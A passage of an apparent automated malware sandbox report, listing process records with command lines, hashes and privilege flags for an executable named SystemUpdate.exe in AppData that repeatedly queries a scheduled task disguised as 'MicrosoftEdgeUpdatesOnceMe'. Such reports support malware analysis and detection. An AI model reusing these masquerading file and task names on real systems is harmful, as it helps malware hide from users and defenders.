                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:18
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:19
                                                                                                                      Start time:07:39:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff6577f0000
                                                                                                                      File size:5'387'223 bytes
                                                                                                                      MD5 hash:6BDDA8BA15F8F472FE7D065689E7D35D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:20
                                                                                                                      Start time:07:39:14
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Users\user\AppData\SystemUpdate.exe
                                                                                                                      Imagebase:0x7ff6577f0000
                                                                                                                      File size:5'387'223 bytes
                                                                                                                      MD5 hash:6BDDA8BA15F8F472FE7D065689E7D35D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:21
                                                                                                                      Start time:07:39:16
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:22
                                                                                                                      Start time:07:39:16
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:23
                                                                                                                      Start time:07:39:16
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:26
                                                                                                                      Start time:07:39:22
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:27
                                                                                                                      Start time:07:39:23
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:28
                                                                                                                      Start time:07:39:23
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:29
                                                                                                                      Start time:07:39:30
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:30
                                                                                                                      Start time:07:39:30
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:31
                                                                                                                      Start time:07:39:30
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:32
                                                                                                                      Start time:07:39:35
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:33
                                                                                                                      Start time:07:39:35
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff70f330000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:34
                                                                                                                      Start time:07:39:35
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:35
                                                                                                                      Start time:07:39:41
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:36
                                                                                                                      Start time:07:39:41
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:37
                                                                                                                      Start time:07:39:41
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:38
                                                                                                                      Start time:07:39:45
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:39
                                                                                                                      Start time:07:39:45
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:40
                                                                                                                      Start time:07:39:45
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:41
                                                                                                                      Start time:07:39:51
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:42
                                                                                                                      Start time:07:39:51
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:43
                                                                                                                      Start time:07:39:51
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:44
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff72bec0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:45
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:46
                                                                                                                      Start time:07:39:56
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:47
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:48
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:49
                                                                                                                      Start time:07:40:01
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:50
                                                                                                                      Start time:07:40:05
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:51
                                                                                                                      Start time:07:40:06
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                      File size:55'320 bytes
                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:52
                                                                                                                      Start time:07:40:06
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2004,i,6640444533988444684,5159300963362034494,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:53
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:54
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:55
                                                                                                                      Start time:07:40:08
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:56
                                                                                                                      Start time:07:40:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:57
                                                                                                                      Start time:07:40:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,4545882299053764737,12810531249114103037,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:58
                                                                                                                      Start time:07:40:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:59
                                                                                                                      Start time:07:40:13
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:60
                                                                                                                      Start time:07:40:14
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe
                                                                                                                      Imagebase:0x7ff76f990000
                                                                                                                      File size:235'008 bytes
                                                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:61
                                                                                                                      Start time:07:40:20
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "schtasks /Query /TN MicrosoftEdgeUpdatesOnceMe"
                                                                                                                      Imagebase:0x7ff70dbc0000
                                                                                                                      File size:289'792 bytes
                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:62
                                                                                                                      Start time:07:40:20
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.microsoft.com/fwlink/?LinkId=530045
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:64
                                                                                                                      Start time:07:40:20
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2012,i,6542869062695771062,17740834492215068834,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:65
                                                                                                                      Start time:07:40:20
                                                                                                                      Start date:29/12/2024
                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                      File size:862'208 bytes
